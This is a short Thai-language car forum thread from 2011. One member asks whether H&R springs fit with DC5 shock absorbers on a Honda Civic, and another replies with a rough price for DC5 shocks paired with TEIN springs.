ที่อยู่: ลาดกระบัง
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 15 พฤศจิกา 2011 08:45 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
แล้วสปริง H&R ที่ใส่กะโช๊คเดิม เอามาใส่กะโช๊ค DC5 ได้ป่ะครับ มันใส่ด้วยกันได้มั้ยครับ ??

ถามไว้เป็นข้อมูลครับ ยังไม่เปลี่ยนเร็วๆนี้ครับ

**ดูเหมือนโช๊ค EP3 จะหายาก อิอิ**
klaoies


ชื่อเล่น: เก้าอี้

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 241

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 348

ที่อยู่: nonthaburi
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 พฤศจิกา 2011 09:03 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
โช๊คDC5+สปริงTEIN ประมาณ 14000 15000 แหล่มคับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.